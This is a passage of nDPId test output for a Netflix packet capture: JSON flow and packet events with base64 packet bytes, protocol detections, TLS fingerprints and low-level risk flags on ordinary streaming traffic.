{"hostname":"23.246.3.140","url":"23.246.3.140\/?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-8u4vlcPuFqcOLnLyb9DDtK-bB4","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1921,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064669,"flow_last_seen":1484319064669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064669,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1921,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1484319064669,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064669,"pkt":"gCqoTGHM5JjWH70UCABFAABAhwJAAEAGqhTAqAEHNr8RM8\/JAbsptVYdAAAAALAC\/\/+MwgAAAgQFtAEDAwUBAQgKH2Uv3QAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1922,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064671,"flow_last_seen":1484319064671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064671,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1922,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1484319064671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064671,"pkt":"gCqoTGHM5JjWH70UCABFAABAbOBAAEAGxDbAqAEHNr8RM8\/SAbtTxg2UAAAAALAC\/\/+rMAAAAgQFtAEDAwUBAQgKH2Uv3gAAAAAEAgAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":897,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049684,"flow_last_seen":1484319049684,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319049684,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":897,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1484319049684,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319049684,"pkt":"gCqoTGHM5JjWH70UCABFAABAHF1AAEAGFLrAqAEHNr8RM8+qAbupwyRaAAAAALAC\/\/92fwAAAgQFtAEDAwUBAQgKH2T39AAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":898,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1484319049697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319049697,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lq4GcwYwKgBBwBQz6GV0BcIYCoytaAScSDlwwAAAgQFtAQCCAr\/\/IQ4H2T36AEDAwU="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1484319049700,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319049700,"pkt":"gCqoTGHM5JjWH70UCABFAAA0bmdAAEAGhnvAqAEHuBnMGM+hAFBgKjK1ldAXCYAQEBV1gAAAAQEICh9k+AH\/\/IQ4"} +00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":902,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049672,"flow_last_seen":1484319049703,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319049703,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"tp.akam.nflximg.com","url":"tp.akam.nflximg.com\/tpa3\/616\/2041779616.bif","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1484319049740,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319049740,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGRvs2vxEzwKgBBwG7z6pwpjzKqcMkW6ASOJCp2gAAAgQFtAQCCAqtikoKH2T39AEDAwg="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":910,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1484319049743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319049743,"pkt":"gCqoTGHM5JjWH70UCABFAAA0ddRAAEAGu07AqAEHNr8RM8+qAbupwyRbcKY8y4AQEBUA7QAAAQEICh9k+CqtikoK"} +00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":912,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049684,"flow_last_seen":1484319049748,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319049748,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00976{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":913,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319049672,"flow_last_seen":1484319049753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1484319049753,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"tp.akam.nflximg.com","url":"tp.akam.nflximg.com\/tpa3\/616\/2041779616.bif","code":200,"content_type":"text\/plain","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} +01018{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":920,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319049684,"flow_last_seen":1484319049807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319049807,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01358{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":923,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319049684,"flow_last_seen":1484319049850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319049850,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319050652,"flow_last_seen":1484319050652,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319050652,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1484319050652,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319050652,"pkt":"gCqoTGHM5JjWH70UCABFAABA2xBAAEAGenHAqAEHF\/YLkc+rAFC8XkCtAAAAALAC\/\/9pzAAAAgQFtAEDAwUBAQgKH2T7jgAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1484319050677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319050677,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmYX9guRwKgBBwBQz6susPTdvF5ArqAS\/\/\/2WQAAAgQFtAEDAwkEAggKRVwbeB9k+44="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":971,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1484319050678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319050678,"pkt":"gCqoTGHM5JjWH70UCABFAAA0kSxAAEAGxGHAqAEHF\/YLkc+rAFC8XkCuLrD03oAQEBUU+gAAAQEICh9k+6dFXBt4"} +01128{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":972,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319050652,"flow_last_seen":1484319050682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319050682,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.145","url":"23.246.11.145\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=5xfYVtna3GdYXL71uNs6DZ-X84Y&random=3930708224","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1027,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319052216,"flow_last_seen":1484319052216,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319052216,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1027,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1484319052216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319052216,"pkt":"gCqoTGHM5JjWH70UCABFAABAN3hAAEAGHxDAqAEHF\/YKi8+sAFBgdy0VAAAAALAC\/\/\/UZQAAAgQFtAEDAwUBAQgKH2UBeQAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1484319052235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319052235,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGW2wX9gqLwKgBBwBQz6xlmlqWYHctFqAS\/\/8JBgAAAgQFtAEDAwkEAggKQI7bkB9lAXk="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1484319052237,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319052237,"pkt":"gCqoTGHM5JjWH70UCABFAAA0JFZAAEAGMj7AqAEHF\/YKi8+sAFBgdy0WZZpal4AQEBUnrAAAAQEICh9lAYxAjtuQ"} +01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319052216,"flow_last_seen":1484319052242,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319052242,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.10.139","url":"23.246.10.139\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-djGXIcbFBNzyfugqEWcrgtCpyY&random=3407360776","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1100,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319054101,"flow_last_seen":1484319054101,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319054101,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1484319054101,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319054101,"pkt":"gCqoTGHM5JjWH70UCABFAABA9bFAAEAGZ9XAqAEHF\/YDjM+zAFBtwXYMAAAAALAC\/\/99\/AAAAgQFtAEDAwUBAQgKH2UImQAAAAAEAgAA"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1484319054132,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319054132,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADgGZWsX9gOMwKgBBwBQz7OFwt93bcF2DaAS\/\/\/aJAAAAgQFtAEDAwkEAggKhKDK7B9lCJk="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1102,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1484319054134,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319054134,"pkt":"gCqoTGHM5JjWH70UCABFAAA0mQ1AAEAGxIXAqAEHF\/YDjM+zAFBtwXYNhcLfeIAQEBX4vQAAAQEICh9lCLmEoMrs"} +01125{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1103,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319054101,"flow_last_seen":1484319054139,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":354,"flow_tot_l4_payload_len":354,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1484319054139,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.3.140","url":"23.246.3.140\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-8u4vlcPuFqcOLnLyb9DDtK-bB4&random=357509657","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056204,"flow_last_seen":1484319056204,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056204,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1484319056204,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056204,"pkt":"gCqoTGHM5JjWH70UCABFAABAfy9AAEAG1l7AqAEHF\/YLhc+0AFDwxwoWAAAAALAC\/\/9XEAAAAgQFtAEDAwUBAQgKH2UQewAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1232,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056210,"flow_last_seen":1484319056210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056210,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1232,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1484319056210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056210,"pkt":"gCqoTGHM5JjWH70UCABFAABAc11AAEAG4jDAqAEHF\/YLhc+1AFCjZhjfAAAAALAC\/\/+VoQAAAgQFtAEDAwUBAQgKH2UQgQAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1233,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056214,"flow_last_seen":1484319056214,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056214,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1233,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1484319056214,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056214,"pkt":"gCqoTGHM5JjWH70UCABFAABAlQtAAEAGwHrAqAEHF\/YLjc+2AFBDrGT6AAAAALAC\/\/+pMwAAAgQFtAEDAwUBAQgKH2UQhQAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1234,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1484319056215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056215,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWnIX9guFwKgBBwBQz7RnATKV8McKF6AS\/\/8JWwAAAgQFtAEDAwkEAggKNWmPpR9lEHs="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1235,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1484319056219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056219,"pkt":"gCqoTGHM5JjWH70UCABFAAA0oIhAAEAGtRHAqAEHF\/YLhc+0AFDwxwoXZwEyloAQEBUoBwAAAQEICh9lEIg1aY+l"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1236,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056221,"flow_last_seen":1484319056221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056221,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 